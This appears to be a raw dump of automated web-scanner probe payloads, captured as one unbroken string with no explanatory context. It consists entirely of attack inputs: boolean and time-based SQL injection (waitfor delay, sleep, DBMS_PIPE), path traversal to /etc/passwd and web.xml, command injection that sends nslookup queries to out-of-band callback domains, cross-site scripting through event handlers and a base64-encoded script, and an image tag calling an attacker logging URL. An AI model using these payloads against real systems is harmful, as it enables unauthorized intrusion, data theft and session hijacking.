iexplode -1' OR 2+450-450-1=0+0+0+1 or '7Y3rBE3E'=' -1); waitfor delay '0:0:15' -- 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98) %2fetc%2fpasswd WEB-INF\web.xml ".gethostbyname(lc("hithv"."kymvikzu512a1.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(85).chr(115).chr(71)." action.php/. 1"onmouseover=u0lw(94382)" PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9667'> 1<img sRc='http://attacker-9064/log.php? iexploder -1" OR 2+179-179-1=0+0+0+1 -- &nslookup -q=cname hitbigwcniepufb5ff.bxss.me&'\"`0&nslookup -q=cname hitbigwcniepufb5ff.bxss.me&`' 15)||' /.././.././.././.././.././.././.././../etc/./passwd%00 ${10000358+10000169} "&&sleep(27*1000)*zygeql&&" xfs.bxss.me 1" AMOa=u0lw([!+!]) ENl=" 1<body onload=u0lw(9057)> 1<aHtmMHJ< iexplore if(now()=sysdate() 1 waitfor delay '0:0:15' -- 1'" ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg '||sleep(27*1000)*muqeew||' '"